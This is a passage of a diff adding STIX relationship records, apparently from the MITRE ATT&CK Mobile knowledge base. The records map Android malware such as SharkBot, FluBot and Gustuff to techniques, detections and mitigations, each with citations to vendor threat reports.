new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:36:23.084Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can manipulate clipboard data to replace cryptocurrency addresses.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2cb834dd-d7cf-46f3-a19b-bdbfb5bfee07", + "created": "2023-03-20T18:54:25.458Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:54:25.458Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d7d78682-c9ad-4880-ae6e-3fc79f3737f1", + "created": "2019-09-04T15:38:56.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. 
Retrieved September 4, 2019.", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:37:35.704Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can delete data from a compromised device.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d54d3475-19ee-4ac5-98b0-ec1ae9336dfb", + "created": "2023-03-20T18:58:14.140Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:14.140Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1ed5b4fa-b871-4efa-87ee-1c91dcaa421e", + "type": "relationship", + "created": "2019-09-03T19:45:48.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. 
(2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T16:47:53.226Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two extracts information from Facebook, Facebook Messenger, Gmail, IMO, Skype, Telegram, Viber, WhatsApp, and WeChat.(Citation: SWB Exodus March 2019)", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7657a4d4-1ba3-4b66-83f7-6db5eab14847", + "created": "2022-04-06T13:30:03.526Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be taught that Device Administrator permissions are very dangerous, and very few applications need it.", + "modified": "2022-04-06T13:30:03.527Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--e2c2249a-eb82-4614-8dd4-9c514dde65e2", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a011bcc6-b5d8-4923-b533-55abec69ff2f", + "created": "2022-03-30T20:07:33.291Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T20:07:33.291Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2", + "target_ref": 
"attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e012da15-7669-4764-ad9d-8a1d817bcca9", + "created": "2023-03-20T18:23:04.068Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:23:04.068Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2f8b5252-551c-4a0d-8e72-8da4050757f3", + "type": "relationship", + "created": "2021-04-19T14:29:46.530Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2021-04-19T14:29:46.530Z", + "description": " [SilkBean](https://attack.mitre.org/software/S0549) can send SMS messages.(Citation: Lookout Uyghur Campaign) ", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fcc42341-ec3a-4e24-a374-46bed72d061f", + "type": "relationship", + "created": "2021-10-01T14:42:49.191Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." 
+ } + ], + "modified": "2021-10-01T14:42:49.191Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect data from messaging applications, including WhatsApp, Viber, and Facebook.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0d82a9ed-4184-4f95-99f4-5ee467fe6594", + "created": "2022-04-05T17:14:08.267Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:14:08.267Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3b0cb886-dabc-4622-b91f-3851e2a71bf2", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. 
Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:02:40.717Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) used HTTP uploads to a URL as a command and control mechanism.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fe794ba6-42be-4d42-a16f-a41473874331", + "created": "2022-03-30T15:08:13.679Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android-VerifiedBoot", + "url": "https://source.android.com/security/verifiedboot/", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android Verified Boot can detect unauthorized modifications made to the system partition, which could lead to execution flow hijacking.(Citation: Android-VerifiedBoot) ", + "modified": "2022-03-30T15:08:13.679Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eb58117c-5803-4f72-a499-5fa888a9a7a5", + "created": "2022-04-06T15:47:06.163Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:47:06.163Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "target_ref": "attack-pattern--c6a146ae-9c63-4606-97ff-e261e76e8380", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1c67b72f-7389-4c21-9347-2b1bba07aaaf", + "created": "2023-02-06T18:59:46.976Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:12:28.993Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can collect device IP address and SIM information.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2e913583-123a-47af-8872-98fc12ab4a6a", + "type": "relationship", + "created": "2020-11-24T17:55:12.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." 
+ } + ], + "modified": "2020-11-24T17:55:12.846Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can send SMS messages.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5de0caa8-81f8-453c-b70c-a74e7ea9e5c2", + "created": "2022-03-30T19:12:31.481Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:12:31.481Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "target_ref": "attack-pattern--b7c0e45f-0206-4f75-96e7-fe7edad3aaff", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0e8607f6-daab-44df-b167-105403a4ef41", + "created": "2023-01-18T19:57:33.986Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. 
Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:39:39.355Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use the “Direct Reply” feature of Android to automatically reply to notifications with a message provided by C2.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b37ebb4e-0536-4de0-8e00-7b3d942a02b7", + "created": "2023-03-20T15:33:34.181Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:33:34.181Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cf4fe189-58cf-42aa-89c7-75bd0a83a263", + "created": "2023-03-15T16:23:59.107Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:23:59.107Z", + "description": "", + "relationship_type": "detects", + "source_ref": 
"x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "target_ref": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--48854999-1c12-4454-bb7c-051691a081f9", + "created": "2022-03-28T19:25:49.640Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Ensure Verified Boot is enabled on devices with that capability.", + "modified": "2022-03-28T19:25:49.640Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5d2a3a9f-2467-4ac6-ab64-ffe91ec584da", + "type": "relationship", + "created": "2021-09-24T14:52:41.308Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2021-09-24T14:52:41.308Z", + "description": " [Monokle](https://attack.mitre.org/software/S0407) can hook itself to appear invisible to the Process Manager.(Citation: Lookout-Monokle) ", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--ccde43e4-78f9-4f32-b401-c081e7db71ea", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--08a43019-d393-451f-a23c-2dfa17ec40b2", + "created": "2023-01-18T19:15:24.775Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:51:07.963Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can steal incoming SMS messages and send SMS messages from compromised devices. 
(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2bedbf86-2ef0-45bf-950d-b9d072c03bdc", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:37:02.853Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) stole call logs.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--96569099-db95-4f3c-8ded-6d9cf023e55e", + "created": "2019-09-03T20:08:00.717Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). 
Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": " [Gustuff](https://attack.mitre.org/software/S0406) can use SMS for command and control from a defined admin phone number.(Citation: Talos Gustuff Apr 2019) ", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a04ae7d7-1500-49c9-bada-1a75a8670f5c", + "created": "2019-11-21T19:16:34.820Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CheckPoint SimBad 2019", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/", + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[SimBad](https://attack.mitre.org/software/S0419) generates fraudulent advertising revenue by displaying ads in the background and by opening the browser and displaying ads.(Citation: CheckPoint SimBad 2019)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2793d721-df10-4621-8387-f3342def59a1", + "created": "2022-03-30T18:14:36.786Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "On iOS, the `allowEnterpriseAppTrust` and `allowEnterpriseAppTrustModification` configuration profile restrictions can be used to prevent users from installing apps signed using enterprise distribution keys. ", + "modified": "2022-03-30T18:14:36.786Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--98a4a746-e7bf-494c-9ee3-584403d76d3e", + "created": "2023-02-28T20:34:18.504Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. 
Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:12:45.147Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can use HTTP POST requests on port 80 for communicating with its C2 server.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--049c39ab-c036-457a-9b8f-4318416658b8", + "created": "2022-03-30T19:54:24.468Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "A locked bootloader could prevent unauthorized modifications of protected operating system files. 
", + "modified": "2022-03-30T19:55:15.724Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--38962b26-7cbe-4761-8b4f-50a022167c4d", + "created": "2019-09-03T20:08:00.708Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": 